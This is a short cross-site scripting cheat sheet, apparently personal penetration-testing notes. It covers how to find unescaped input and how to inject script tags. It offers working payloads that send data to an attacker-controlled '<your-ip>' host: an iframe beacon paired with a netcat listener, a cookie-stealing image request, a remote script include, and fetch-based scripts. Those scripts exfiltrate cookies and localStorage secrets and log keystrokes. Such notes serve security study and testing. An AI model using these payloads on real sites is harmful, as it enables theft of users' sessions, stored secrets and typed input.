Cross-Site Scripting (XSS)

Notes

There are 4 types:

  • Stored Client XSS
  • Reflected Client XSS
  • Stored Server XSS
  • Reflected Server XSS

Attack Vector

  1. Identifying XSS Vulnerabilities Most common special characters:
< > - used to denote HTML elements 
' " - strings
{ } - javascript function declarations
;   - end of statement
  1. Basic XSS Check if any submission form accept any characters above and if they are escaped. If not, we can insert tags <script></script>
  2. Content Injection We can inject an iframe like so:
<iframe src="http://<your-ip>/report" height=”0” width=”0”></iframe>

And start listening on port 80 to receive that request (with some useful client data, like User-Agent):

sudo nc -nvlp 80
  1. Stealing Cookies and Session Information If we inject this script, it will send to you IP the client cookie:
<script>new Image().src="http://<your-ip>/cool.jpg?output="+document.cookie;</script>
  1. Payload from the external resource You can serve a JS file on your local VM and inject it like this:
<script src="http://<your-ip>/xss.js"></script>

Examples of remote JS payloads files

Cookies

let cookie = document.cookie

let encodedCookie = encodeURIComponent(cookie)

fetch("http://<your-ip>/exfil?cookies=" + encodedCookie)

Secrets

let data = JSON.stringify(localStorage)

let encodedData = encodeURIComponent(data)

fetch("http://<your-ip>/exfil?secrets=" + encodedData)

KeyLogger

function logKey(event){
        fetch("<your-ip>/k?key=" + event.key)
}

document.addEventListener('keydown', logKey);

Other

navigator.userAgent // this contains information about the user agent: https://developer.mozilla.org/en-US/docs/Web/API/Navigator/userAgent